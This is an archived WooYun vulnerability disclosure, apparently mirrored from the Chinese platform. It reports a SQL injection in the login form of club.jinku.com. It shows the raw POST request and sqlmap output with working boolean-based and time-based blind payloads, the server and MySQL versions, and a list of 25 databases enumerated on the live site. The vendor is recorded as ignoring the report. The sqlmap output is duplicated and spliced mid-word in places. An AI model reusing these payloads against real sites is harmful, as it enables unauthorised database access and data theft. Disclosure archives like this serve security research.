乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-23: 细节已通知厂商并且等待厂商处理中 2015-11-28: 厂商已经主动忽略漏洞,细节向公众公开
POST /login.php?action=login HTTP/1.1Content-Length: 109Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://club.jinku.comCookie: Hm_lvt_c00ce49b36dc28cbed5357683feaa043=1447628262; Hm_lpvt_c00ce49b36dc28cbed5357683feaa043=1447628262Host: club.jinku.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*button=&password=g00dPa%24%24w0rD&username=2222
username存在注入,or类型的,需要--rask=3
sqlmap resumed the following injection point(s) from stored session:---Parameter: username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: button=&password=g00dPa$$w0rD&username=-2419' OR 5186=5186 AND 'GtHT'='GtHT Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: button=&password=g00dPa$$w0rD&username=11111' AND (SELECT * FROM (SELECT(SLEEP(5)))pZLv) AND 'YzEH'='YzEH---web application tecsqlmap resumed the following injection point(s) from stored session:---Parameter: username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: button=&password=g00dPa$$w0rD&username=-2419' OR 5186=5186 AND 'GtHT'='GtHT Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: button=&password=g00dPa$$w0rD&username=11111' AND (SELECT * FROM (SELECT(SLEEP(5)))pZLv) AND 'YzEH'='YzEH---web application technology: Apache 2.0.64, PHP 5.2.17back-end DBMS: MySQL 5.0.12hnology: Apache 2.0.64, PHP 5.2.17back-end DBMS: MySQL 5.0.12available databases [25]:[*] `match`[*] acr[*] ask[*] bbs_blog[*] chat[*] chat2[*] club[*] czbisai[*] db_mjolnir[*] ecshop[*] information_schema[*] magazine[*] mail_sender[*] match_db_bak[*] match_old[*] mysql[*] newcms[*] performance_schema[*] question[*] salon[*] signs[*] test[*] topd[*] wiki[*] zixun
危害等级:无影响厂商忽略
忽略时间:2015-11-28 14:54
漏洞Rank:4 (WooYun评价)
暂无